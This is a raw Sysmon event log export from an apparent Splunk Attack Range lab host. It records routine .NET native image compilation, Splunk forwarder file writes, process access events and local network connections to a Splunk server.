AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DRXE7BI8R7\XsdBuildTask.ni.dll.auxMD5=C954DE22DFCAFB62BC1C109024C640BC,SHA256=939D076EA2C4DCE34545868FCFA4DACF3B5A9CD1B65D7CF131A67EBFD551C44E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024040Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.686{4DB9351A-A28E-60D3-1506-00000000CF01}5876NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\DRXE7BI8R7\XsdBuildTask.ni.dllMD5=B03E8954E2B34A2B0606EEEF926FA9BD,SHA256=EFCD05CC1A264A2E3C1DD10D2833AFD943C45B93B9BE344F23917B575A9B3833,IMPHASH=00000000000000000000000000000000truetrue 10341000x800000000000000024039Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.655{4DB9351A-9DDD-60D3-0C00-00000000CF01}844956C:\Windows\system32\svchost.exe{4DB9351A-A28E-60D3-1506-00000000CF01}5876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024038Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.639{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A28E-60D3-1506-00000000CF01}5876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000024037Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.639{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A28E-60D3-1506-00000000CF01}5876C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38ddd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38a6c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+38801(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+14a3f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+115b9(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+dea0(wow64) 23542300x800000000000000024036Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.639{4DB9351A-A28D-60D3-1406-00000000CF01}5460NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0O1TVTJQ1G\mscorlib.ni.dll.auxMD5=8800C2118B78F7DECF8FF943AC00E180,SHA256=4FB885DD7E35BDFC4B057A29D1999998335E16BB9758E501D01E0B3F2CB82567,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024035Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.623{4DB9351A-A28D-60D3-1406-00000000CF01}5460NT AUTHORITY\SYSTEMC:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\temp\0O1TVTJQ1G\mscorlib.ni.dllMD5=0951E2E07BA2A60B97B32783CB57C827,SHA256=40B3D137627CA7DFCA43AA8AA25A4F53D7D5E3F2B5EDFA770C194C963D839C47,IMPHASH=00000000000000000000000000000000truetrue 23542300x800000000000000024034Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.264{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0E6B796AF95D6D20E36D6C12765B9AC,SHA256=B293C6FB8E09DFF7130860420DF08689DEE1C1F5A0F661A93F329EA306A61E93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024033Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.170{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=DA65A552C176137A08A0D741DF277E05,SHA256=060696D58A942E731C72112D1C1E4FE15098DEA8448C955F32ACA34BA0C9DD62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024032Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.170{4DB9351A-9DDD-60D3-1200-00000000CF01}416NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=78B10387F65FFCEA8D7A3E46D741BE8F,SHA256=A8E17ABFD155A8989BF92B1AF2D31E6A6CC2F8CAB2836BC5B7CCC04B96659F77,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000024031Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.123{4DB9351A-9DDE-60D3-1600-00000000CF01}12925768C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2a2f2|C:\Windows\system32\wbem\wmiprvsd.dll+29e26|C:\Windows\system32\wbem\wmiprvsd.dll+28432|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000024030Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:26.123{4DB9351A-9DDE-60D3-1600-00000000CF01}12925768C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2900-00000000CF01}2912C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\wmiprvsd.dll+2597b|C:\Windows\system32\wbem\wmiprvsd.dll+283dc|C:\Windows\system32\wbem\wmiprvsd.dll+57817|C:\Windows\system32\wbem\wmiprvsd.dll+8a475|C:\Windows\system32\wbem\wbemcore.dll+bcb3|C:\Windows\system32\wbem\wbemcore.dll+3393|C:\Windows\system32\wbem\wbemcore.dll+22adf|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+2c9be|C:\Windows\system32\wbem\wbemcore.dll+202d8|C:\Windows\system32\wbem\wbemcore.dll+390e|C:\Windows\system32\wbem\wbemcore.dll+22bba|C:\Windows\system32\wbem\wbemcore.dll+22a19|C:\Windows\system32\wbem\wbemcore.dll+21f5a|C:\Windows\system32\wbem\wbemcore.dll+22711|C:\Windows\system32\wbem\wbemcore.dll+2d78c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000024049Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:27.639{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24D05F825F42B86EFB27E4D9523D0FD5,SHA256=08D8ED7748D8986868C335E53CD0D9D952E7701D8E494A083089A914D5D20FD3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024048Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:27.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB6EE7F814CB3A0997C2F1507A9AF44B,SHA256=2A40A60D0EA95920F077C005FAB8497EA8FC07B08E4B7FC77324E3FB6AD05716,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024051Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:28.889{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=B975C5A66AF66D8F80FCBC0575C6B271,SHA256=19F75C527E59DC35E160FBA67CCC0485F0F59057B0CA44169F0D98C5BECFEA09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024050Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:28.326{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F413D6253891F276094DFD8686B3E5DD,SHA256=53670FF3917AD14B27485E195DB242211D5EDA31B72359A940E03688F79D44A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024053Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:29.764{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5=06ECD6792346DC8AAF23A6F711696E96,SHA256=19A2BF10692B3229A38BF109CEB63DBC37629513FE005DF1EF53BEAAF2F2E59D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024052Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:29.358{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=625DED54C798577348B86B19283B1379,SHA256=AD5D0BE9305747C2552DEFED36CF481AEA47CEDABBDE9955C4C16CE0C789E380,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024056Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:29.162{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61471-false10.0.1.12-8000- 23542300x800000000000000024055Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:30.370{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A5430A82A4A035BBBE8F6FAE60498FB8,SHA256=5BC4DBF012758FE976D538CB2EEC4BBD34B4D016EC90B8ABAF22CF7B06B38580,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024054Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:30.092{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=068BCF44A1C16AEBB080017DAA4359CB,SHA256=9D090A199E0B7FE30BFE75039844588435ADBF32E5EFDE20D713468D1EAD0797,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024057Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:31.386{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B401F7BE46D0FF7308ABE2E8EB1CE343,SHA256=61A9C716C583EBB5634D633368B9F8ECB883882C7AC6F0AABC73A9F626200F52,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024058Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:32.401{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DE4B3BDABD4FC737E2465AD2E87F2137,SHA256=61507357E0C48B8687F4F9463B5D2FDD4CA809581AB2345F4DBC75FD3CBB49E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024059Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:33.401{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=83E1A2D02D000025E1C1BFF6D6D630E9,SHA256=18F822CA3E6BB8B38EB6DD39DA3B0C8AFCE26999DCC2249E055D71E9DEC93779,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024060Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:34.432{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4645D03B971A611B1E1D17916B9073D0,SHA256=F1DAB188E69DAF65A992E4387E5A6F624C81B09B134EAB241628318CDE4EDD4E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024063Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:35.839{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFE9DF37BF89A5AF1A4B722088208D6F,SHA256=DE940DD51739BC41CEF2410185E3F482017B67B5BE7735FA1D224392BCB8716F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024062Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:35.839{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ADC03BEA9F0388DAEF254674FB6CC8C2,SHA256=5E59D2C544A4160836867300114D67923A0B2AAEDC3B2136C642A76871226FC1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024061Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:35.448{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=009026C42614F42CA061318E47817255,SHA256=7C49BAED127A212F18F9E380DBC3090A7C4F03089163EBF1EE063E1A83D3B861,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024065Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:36.479{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E027D1810A1B4EE6F232E315018E9644,SHA256=8006388346C76A732BBCDF244A2BE895A29EF42C1C4C578C962C4151D7C45500,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024064Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:34.206{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61472-false10.0.1.12-8000- 23542300x800000000000000024066Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:37.495{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B68A12FB8FA255D9D4C90D396DCD7022,SHA256=82B0CF6B390C9ED71B3027BD4DDE3A9C9A3B562EAAA918709F5BE5A3B99A606B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024067Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:38.511{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=69DF458C0F878F7EA00ACDA71946785E,SHA256=F1551EF3BBE44E0103B31FAA9AA25CC3980738DAE2F2277575635944E13BF4D6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024069Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.526{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=505F74DA69C47792849486EDC3CC243B,SHA256=CB2A5FC35AD180003C19A557139E02DAAB62894520DDB2DFC1BF7FED0E12E829,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024068Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.167{4DB9351A-9DEA-60D3-3000-00000000CF01}2404NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=CC494228D9B622F65865431EE32BBCD9,SHA256=4850E6D9F469EFAD53275876C967519322E99DE1F613F517E377B814E20689E0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024072Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.221{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61474-false10.0.1.12-8000- 354300x800000000000000024071Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:39.206{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61473-false10.0.1.12-8089- 23542300x800000000000000024070Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:40.530{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CF41F7E91F010C3B07DD6A4411384A80,SHA256=49FB73C4036CF8AF21946E3A464C27D7843A66E254FFF5FDA1FD25C8601D055B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024073Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:41.543{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF780B2A4A32AC855259974750671288,SHA256=6C4144E7EA60FC31A3BE87496DAC05D6C08FF68F2F130F0AF26EDEB6CC5BA5CB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024074Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:42.559{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB3263D5FB852157D5E652147ABB8355,SHA256=F8C9C765A126C348869D5A746756DFC8A815E1946BB0BD01ADB0FC6A0CE0D99C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024075Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:43.559{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8F9DAD7FC040D643819692B1768A0003,SHA256=C436D64F0933919E0208FA479511EF870E7917EC31B212644C2758503988A54B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024076Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:44.637{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=592F87529BA4A4B4B6B0BB0E84EB1AA5,SHA256=70563060B293180AC45E325E4BCA09089919FBFEABC807253D7FEDB2BA254558,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000024078Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:44.223{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61475-false10.0.1.12-8000- 23542300x800000000000000024077Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:45.668{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937739ABDFC3D440B43641DD2459B9B8,SHA256=4A54C1AEDC812DED7BE1E366CF4652553D4D5E23B9F2A410B26E60BDEA2993FA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024079Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:46.668{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=937048A9799133F9830998D206EA41A5,SHA256=C9899124DF5E7A8BB035A63E8AC63767CC3C7604F035605193D10BA627B1C938,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024080Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:47.684{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=703D0A4377C8FD6DB454421DD27A585F,SHA256=0E65C969173EB8C58D82889F9C109D5EDBC929A44B600030C4B03A05240FF8CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000024081Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:07:48.699{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 